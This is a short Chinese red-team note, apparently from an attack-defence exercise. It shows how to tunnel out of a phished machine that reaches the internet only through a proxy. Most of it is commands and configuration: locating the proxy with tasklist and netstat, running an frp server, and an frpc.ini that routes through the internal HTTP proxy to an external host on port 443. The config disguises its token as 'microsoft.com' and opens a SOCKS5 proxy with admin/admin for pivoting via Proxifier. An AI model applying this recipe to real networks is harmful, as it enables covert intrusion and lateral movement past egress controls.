背景

场景:在xxx护网中通过钓鱼钓到了个人机器,但是可以通过HTTP到CS服务器上,通过ping 不到外网的服务器上,通过定位定位程序pid,发现该台主机通过访问代理服务器上网。这里需要在配置文件中配置对应的指向到代理服务器上网。

定位问题

  1. tasklist |findstr [可以上网的程序]
  2. 查看对应程序的PID
  3. netstat -ano |findstr [pid]
  4. 查看

image.png

服务端

  1. frps -p [监听端口] -t [token]
  2. #原版配置文件即可

客户端

客户端配置文件

  1. [common]
  2. server_addr = 1.1.1.1
  3. server_port= 443
  4. token =microsoft.com
  5. tls_enable =true
  6. delete = false
  7. http_proxy = http://10.1.x.x:80 #指定对应代理服务器
  8. [socks5]
  9. type = tcp
  10. remote_port =30000
  11. plugin =socks5
  12. plugin_user=admin
  13. plugin_passwd=admin
  14. use_compression = true
  1. frpc -c frpc.ini

使用Proxifier 配置对应的地址,端口,账号密码即可。